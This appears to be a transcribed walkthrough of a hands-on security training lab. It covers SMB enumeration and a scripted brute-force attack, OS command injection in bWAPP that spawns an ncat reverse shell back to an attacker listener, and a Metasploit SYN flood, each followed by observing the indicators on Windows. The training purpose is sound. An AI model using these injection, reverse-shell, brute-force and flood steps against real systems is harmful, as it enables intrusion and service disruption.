Okay, so hi guys, welcome to the Analyze Malicious Activity Practice Lab. In this module, you will be provided with the instructions and devices needed to develop your hands-on needed to develop your hands-on skills. Recognizing indicators of network and application attacks is an essential cybersecurity skill. Indicators of compromise and attack enable organizations to respond to attacks effectively and protect sensitive information. In this module, you will become familiar with brute force attack commands, injection, and SYN flood network attack, as well as indications. Getting started. If this is your first time using Practice Labs, please watch our Getting Started video below. Learning outcomes. In this module, you will complete the following exercise. Exercise 1. Observe indications of a brute force attack. Exercise 2. Conduct command injection and observe indications. And lastly, exercise 3. Observe indications of a SYN flood attack. After completing this module, you should be able to perform SMB enumeration and login attempt, conduct and observe a scripted brute force attack, conduct command injection, create a reversal shell through command injection, observe normal activity, and lastly, conduct and observe a SYN flood attack. Exam objectives covered in this module. Given a scenario, analyze indicators of malicious activity, application attacks, password attacks, indicators. Given a scenario, apply common security techniques to computing key source, monitoring. Given a scenario, use data sources to support an investigation, log data. So, lab duration, it will take approximately 1 hour to complete this lab. Help and support. For more information on using practice labs, please see our help and support page. You can also raise a technical support ticket from this page. Click Next to view the top topology used in this module. So lab topology. Using or during your session, you will have access to the following lab configuration. Depending on the exercise, you may or may not use all of the devices, but they are shown here in the layout to get an overall understanding of the topology of the lab. So there are 5 in total, which is ACID C01, ACID M01, ACI Win11, ACI Alma, and lastly is ACI Kali. So click next to proceed to the first exercise. So exercise 1. Observe indications of a brute force attack. Server Message Block or SMB is a network protocol used in Microsoft Windows operating systems for sharing files, printers, and other resources. Attacks on the SMB protocol can lead to compromised systems, stolen data, and network disruptions. In this exercise, you will simulate an attack and enumerate SMB, then conduct a brute force attack on it. As a network defender, you will then observe and recognize the attack in Windows Event Viewer. Learning outcomes. After completing this exercise, you should be able to perform SMB enumeration and login attempt, conduct and observe a scripted brute force. Your devices. So you will be using the following devices in this lab. Please power this on now, which is the ACID01, ACID M01, and lastly is ACI Kali. So task 1. Perform SMB enumeration and login attempt. SMB enumerations is used by attackers to gather information about the environment, identify vulnerabilities, and plan attacks. In this task, as an attacker, you will perform SMB enumeration and attempt to connect to the service. So connect to ACID CM01, click Start and type the following. Event Viewer. Then hit Enter or from the Best Match pop-up menu. So step 2. In the event viewer, expand application and service logs, Microsoft Windows and SMB server. So going to that applications. So where's that? So if you're not sure, right click the picture so you can see the picture. So so application and service logs, Microsoft, then Windows, then scroll down and look for SMB server here. So in the event viewer, select the security logs. So select, observe. There are no logs present. As this exercise continues, this will be the location you will refer to for SMB server security page. So connect to ACI Kali. Okay. So if that or if any tools that you will going to use have some issue, just try to reboot or reset. So it will just going to reset and it should be connected moving forward. So just like what I did to the ACI Kali, I just rebooted it. So it will be connected. Okay, so again, this time it's gonna be reset. Go to ACI Kali. So again, until it turns on. Okay, so once the ACI Kali is already open in the terminal window, type the following and press enter. So nmap space dash p n space 192.168.0.2 and hit enter. So note, as an attacker, these steps walk through the enumeration of ACID M01. The dash PN switch is required for the ACI lab infrastructures and results in an NAMP foregoing the host discovery ping and assuming the target is alive, which is in this case is correct. When the Nmap scan is complete, observe the open ports and find the ports 139 and 445 are open, both associated with SMB. Terminal window, type the following and then press enter. Ulit. N map dash P N 192.168.0.2. Then ENUM for Linux space 192.168.0.2 and hit enter. Note, the Linux tool enum for Linux is used to enumerate information from Windows and Samba. Notice in the output known usernames that includes administrator, guest, ERBT, GT, etc. So here, so in the terminal window, type the following and press enter. So SMPC client space dash dash 192.168.0.2 slash administrator and hit enter. Then note, the SMBC client tool enables communication and connection with SMB workstations. In the terminal window, type the following and press enter. So password, enter. So step 9, connection via SMB requires a password and the password entered is a guess and is incorrect. So step 10, connect to ACID M01. In the event window viewer, right-click on security and select refresh. Okay. So event viewer. So once the logs are refreshed, observe the errors that appears as a result of the single failed login attempt. In the general tab of the selected error, observe in the third error down may differ on your results that the attempted login originated from 192.168.0.5 and was a result of a bad username and authentication information. So data devices in the current network state and proceeds to the next task. So task 2, conduct and observe a scripted brute force attack. Attackers will often automate their attacks as an SMB. Brute force attack occurs when an attacker attempts to gain unauthorized access to the service by systematically guessing credentials through the SMB protocol. In this task, you will conduct a scripted SMB brute force attack. So, ACID M01, where the event viewers window is open. So, in the event viewer, right-click on security. and select clear log. If you're not sure, right click the picture, do security, then clear log. Select save and clear. Then step 3. In the save as dialog, type the following and the file name field. So field underscore login and click save. In step 4, connect to ACI Kali where the terminal windows is open. Terminal window, type the following and enter cd space documents slash module underscore 5 underscore folder. Then hit enter. Note, within this directory, the directory is a script that will be used to conduct a short brute force attack on the SMB protocol. Step 5, in the terminal window, type the following and press enter. So cat dot brute dot sh. Enter. So note, observe the script and find that it is a bash script that iterates through the number 0 to 20 as password to the SMB client connection command. Additionally, at each logon attempt, it outputs to the screen the password that was attempted. An attacker's brute force attack would likely include an algorithm that iterates through all possible combinations of passwords rather than just the number 0 through 20. So in the terminal window, type the following and press order. So dot slash brute dot sh. So note, after the script is run, observe that for all connection attempts, access was denied. So connect to ACIDC01M. In the event viewer, right click the security and click refresh. So observe the step 8, observe the errors in the logs due to the brute force script. Close the event viewer window. So click next. Exercise 2. Conduct command injections and observe indications. Command injections occurs when a attackers can manipulate the input fields of an application to execute an intended operating system commands. This vulnerability is enabled by a failure to validate or sanitize user input before using it to construct and execute system commands. In this exercise, you will conduct a command injection of the WAPP application and achieve a reverse shell to ACI Kali. So learning outcomes. After completing this exercise, you should be able to 1. Conduct command injection, and lastly, create a reverse shell through command injection. So your devices, you will be using the following devices in this lab. Please power this on now. So ACI DC01, ACI DM01, and ACI Kali. So task 1. Conduct command injection. So command injection vulnerabilities can exist in both Linux and Windows system. While the vulnerabilities share similar characteristics, there are some differences in how command injection attacks can be executed on each of these types of operating systems. In this task, you will conduct a command injection and discover the host operating system and install tools. Step 1. To connect to ACIDC M01. So click start charm and select XAMPP, then XAMPP control panel. Note: for this exercise, the Apache and MySQL service must be running. In the XAMPP control panel, select Start for the Apache service. Then step 3 in the XAMPP control panel, select Start for the MySQL service. Step 4, close the XAMPP control panel. Step 5, go back to connect to ACI Kali. Select Firefox at the taskbar. Then in the Firefox, type the following into the address bar and press enter. So http://92.168.0.2 slash BWAPP. Then hit enter. So step 7. In the BWAPP application, enter the following in the login field. So login field B. Then on step 8 in the BWAPP application, enter the following into the password field. So bug. Select medium. So step 9, select a medium from the set the security level drop-down menu. Then step 10, click login. So in the save login for in the save login for the website pop up, please click don't save. Where's that? It didn't show. So step 12, select OS command injection from the which bug do you want to hack today. So OS command injection. So step 13, click hack. Note, at the OS command injection page, observe there is a DNS lookup field that is pre-filled out with www.nsa.gov and a lookup button. This field is likely susceptible to command injection. So step 14, select lookup. So note, a DNS lookup output is displayed below the input field. If this field is susceptible to command injection, this will be a location of any additional command output. In order to understand what commands may be available, you will first discover whether command injection is possible, then determine whether the accepted commands are Windows or Linux based. So in the step 15, type the following in a DNS lookup field, then click lookup. So gov and net stat space dash n lookup. Note, there are several command separators that may work. So and I are command separators that may be acceptable to on both Windows and Linux machines. You will use this first to determine whether there is a command injection vulnerability. Additionally, you will use the netstat-n command because it is an acceptable command in both Windows and Linux. In this case, the AND command separators did not work. So step 16. So type the following in the DNS lookup field, then click lookup. So no, and netstat space dash n and lookup. Notice this is also unsuccessful. Click the following or type the following in the DNS lookup field, then click lookup. So netstat space dash n. So lookup. So note, observe from the output that the pipe command separators is accepted. Next, you will determine whether Windows or Linux commands are accepted. So, host na name ctl. Note, the host named ctl is command is a Linux specific command. Since no output is given, this is not likely a Linux machine. So, type step 19 system info. Note, this command is accepted. Observe that the machine hosting the BWAP or WAPP application is identified as a Windows server. This determines the type of commands that will work in the command injection. So in the BWAP OS command injection page, type the following DNS lookup and click lookup. So www who am I? So look up. Note, observe that the command injection is run as ACIP lab administrator. Next, you will determine if there are any tools installed on the host that can be used for further exploit. So, nmap. So if you're not sure, version. So look up. Note, observe that Nmap is installed as part of the Nmap installation package, and cat may also be installed, which could be used for further exploitation. So again, step 22, ncat dash H. So step 23. This command works and indicates that NCAT is installed on the host machine. NCAT is an enhanced version of NetCat that provides a wide range of capabilities for network communication, including banner grabbing, file transfers, and creating shells. So leave the Firefox window open on the BWAEPP command injection page. So task 2. Create a reverse shell through command injection. So step 1, or sorry, a reverse shell is a type of a shell that is initiated from a target host back to the attacker's machine. It is often used as a post-exploitation technique in cyber attacks to gain remote access to a compromised system. The term reverse indicates the direction of initiated communication when establishing the shell. In this case, the communication initiates from the victim as a connection is established with the attacker's machine. In this task, you will establish a reverse shell through command injection. So in the ACI Kali, click the terminal emulator icon in the taskbar. So step 2, type the following and press enter. So ncat space dash h. So note, through command injection, it has been determined that ncat is installed on the BWAPP host. In order to create a reverse shell, ncat must all be installed on the attack machine, which is the ACI Kali. This test reveals that ncat is installed on ACI Kali. So, in the terminal window again, type the following and press enter. Step 3. So, ncat-lvp space 443. Note, this command established an ncat listener on the ACI Kali machine. Port 443. The switch establish a listening mode. The V switch sets verbosity and the P switch specifies the port listen on. The next step is to initiate a connection from the BWAP P host machine via command injection. So on the taskbar, select the Firefox window. Oops. So step 5, the BWAPP OS command injection page. Type the following in a DNS lookup field, then click lookup. So ncat space 192.168.0.5 space 443 space dash e, just to make sure, space cmd cmd dot exe. So look up. Note, this ncat command connects to the host 192.168.0.5. on port 443 and executes using the E switch cmd which is command shell. So the taskbar, select the terminal. Step 7. In the terminal window, or observe the terminal that a connection has been made from 192.168.0.2. This is a reverse shell. In the terminal window, type the following and press enter. Who, wait, who am I? So observe that the command shell is operating as ACIP lab that slash administrator. Next, you will observe the indications of the connection on the ACID M01. Connect the ACID M01, click the start charm and type the following. So CMD. In the command prompt from the best matchup. So step 10, please enter netstat slash dash n. So step 11, observe there is an established connection between the local host to a remote machine on port 443. This is the attacker shell. Close the command from. So connect the ACI Kali and close the terminal and Firefox window. Terminal, then Firefox. So exercise 3. Observe indications of a SYN flood attack. A SYN flood attack is a type of DOS attack that targets the TCP handshake process. A TCP connection is initiated by a client sending an SYN packet to a server. The server responds and initiates the connection via a SYN or ACK and establishes the connection when the client responds with the final ACK packet in a SYN flood attack. An attack machine sends a large and continuous numbers of SYN requests to the victim. The victim machine responds by initiating a connection host to complete the connection. In SYN flood attacks, the attack machine never completes the TCP handshake process, which can lead to the victim's server resource being overwhelmed during the NADOS. In this exercise, as an attacker, you will use the Metasploit framework to conduct an SYN flood attack. And as a network defender, you will observe the indications of the SYN flood attack. So after learning outcomes, after completing this exercise, you should be able to observe normal activity, conduct and observe an SYN flood attack. You will be using the following devices, so ACID C01, ACID M01, and ACI Kali. So observe normal activity. As a cybersecurity practitioner, it is essential to understand what normal network activity and communications look like. This enables the identification of abnormal and potentially malicious activity. In this task, you will observe normal Windows Task Manager and NetStat activity. So connect to ACID M01, click the Start Charm and type the following. Task Manager. So step 2, Task Manager, more details. Select the Performance tab, sorry. Then step 4, Ethernet on the left pane. Observe normal activity and low kbps receive and an approximately or below kb50 kbps send. activity. Next, you will view normal netstat activity. So step 5, type the following, CMD. So step 6, type the following and press enter. So netstat dash n. So step 7, notice the normal netstat activity for this device. So keep the command prompt and task manager windows open on ACID MC01. So step 2, conduct and observe a SYN flood attack. The Metasploit framework is an open source exploitation tools. It provides a comprehensive suite of tools for identifying vulnerabilities, testing security measures, and simulating cyber attacks in controlled environments. In this task, as an attacker, you will use the Metasploit framework to launch a SYN flood attack. Then, as a defender, you will observe the indications of attack. So, connect to ACI Kali, then taskbar, terminal emulator. So in the terminal emulator window, type the following and then press enter. So sudo msf console. So this command starts the Metasploit framework, a modular attack framework that will be used to launch an attack to ACID M01 that can be observed. So in the terminal window, type the following and then press enter. So password. So step 4, type the following and then press enter. So once finished, search search S SYN flood. Note, this command at the MFS6 prompt searches the Metasploit framework for SYN flood modules, observes that one result is returned, auxiliary-docs-tcp-SYN flood. Also, notice that this module is provided a module number of 0 in this search output. So the terminal window, type the following and press enter. So use 0. So note, this command identifies the synfload module for use. So type the following and then press enter. Show options. Note, this command displays the configuration choices and requirements for using the selected module. Observe that our host is required but not set and that our port is set for port 80. The R in our host and our port stands for remote and identifies the machine that will be attacked. So in the terminal window, type the following and press enter. So set our host 192.168.0.2. So step 8, set our port 445. So note, recall from exercise 1 that SMB on port 45445 is open on the ACID M01 machine. This is the port that will be attacked. Next, before launching the attack, you will prepare ACIDM to observe the attack. So restore the task manager window from the taskbar. Note, the Ethernet selection in the Performance tab of the taskbar manager will be the first location to notice the attack. So connect to ACI Kali and then on the terminal window type the following and press enter. So run. So, step 11, connect to ECIDM01. Then notice the activity in the Ethernet performance in the task bar. Note, observe the immediate increase in receive communication up to approximately 500 kbps and the screed increase in send communication up to approximately 2 mbps. This is due to the SYN flood attack launch from ACI Kali. Note that the scale of the Ethernet throughput graph will quickly change and will no longer appeal in the maximum rate. So step 13, in the command prompt window, type the following and press enter. So net stat dash observe the many connections to the 192.168 machine on port 445 that have a connection status of sync receive. This is the SYN flood attack, completing step 1 of the TCP handshake. In the command prompt, press Ctrl C key to stop the net stop outpost. Ctrl C. So step 15, close the task manager window. Step 16, click the ACI Kali terminal window, press the Ctrl C key to stop the ACY flood attack. Control. So keep all devices that you have powered on in the current state and proceed to the review section. So review. Well done. You have completed the Analyze Malicious Activity Review practice lab. As you have discovered, indicators of compromise and attack play a pivotal role in the security of an enterprise network and the integrity of sensitive information. Organization must be able to analyze potential malicious and malicious activity to identify threats, respond effectively, and continuously improve their security posture. Summary. You completed the following exercise. Exercise 1. Observe indications of a brute force attack. Exercise 2. Conduct command injections and observe indications. Exercise 3. Observe indications of an SYN attack. So you should now be able to perform SMB enumeration and login attempt. Conduct and observe a scripted brute force attack. Conduct command injection. Create a reverse shell through command injection. Observe normal activity, and lastly, conduct and observe SYN flood attack. So feedback, so submit, shut down all machines used in this lab. So done. Power off. So finished.